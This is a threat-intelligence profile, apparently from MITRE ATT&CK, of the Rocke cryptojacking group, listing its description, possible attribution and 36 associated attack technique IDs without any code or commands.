Description
[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address "[email protected]" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)
Techniques Used (TTPs)
- T1190 — Exploit Public-Facing Application (initial-access)
- T1014 — Rootkit (defense-evasion)
- T1027 — Obfuscated Files or Information (defense-evasion)
- T1102 — Web Service (command-and-control)
- T1562.004 — Disable or Modify System Firewall (defense-evasion)
- T1059.004 — Unix Shell (execution)
- T1082 — System Information Discovery (discovery)
- T1071 — Application Layer Protocol (command-and-control)
- T1105 — Ingress Tool Transfer (command-and-control)
- T1496.001 — Compute Hijacking (impact)
- T1027.004 — Compile After Delivery (defense-evasion)
- T1574.006 — Dynamic Linker Hijacking (persistence, privilege-escalation, defense-evasion)
- T1564.001 — Hidden Files and Directories (defense-evasion)
- T1053.003 — Cron (execution, persistence, privilege-escalation)
- T1059.006 — Python (execution)
- T1046 — Network Service Discovery (discovery)
- T1055.002 — Portable Executable Injection (defense-evasion, privilege-escalation)
- T1102.001 — Dead Drop Resolver (command-and-control)
- T1037 — Boot or Logon Initialization Scripts (persistence, privilege-escalation)
- T1027.002 — Software Packing (defense-evasion)
- T1070.002 — Clear Linux or Mac System Logs (defense-evasion)
- T1547.001 — Registry Run Keys / Startup Folder (persistence, privilege-escalation)
- T1222.002 — Linux and Mac File and Directory Permissions Modification (defense-evasion)
- T1057 — Process Discovery (discovery)
- T1543.002 — Systemd Service (persistence, privilege-escalation)
- T1018 — Remote System Discovery (discovery)
- T1140 — Deobfuscate/Decode Files or Information (defense-evasion)
- T1562.001 — Disable or Modify Tools (defense-evasion)
- T1552.004 — Private Keys (credential-access)
- T1070.004 — File Deletion (defense-evasion)
- T1071.001 — Web Protocols (command-and-control)
- T1571 — Non-Standard Port (command-and-control)
- T1021.004 — SSH (lateral-movement)
- T1070.006 — Timestomp (defense-evasion)
- T1036.005 — Match Legitimate Resource Name or Location (defense-evasion)
- T1518.001 — Security Software Discovery (discovery)
Total TTPs: 36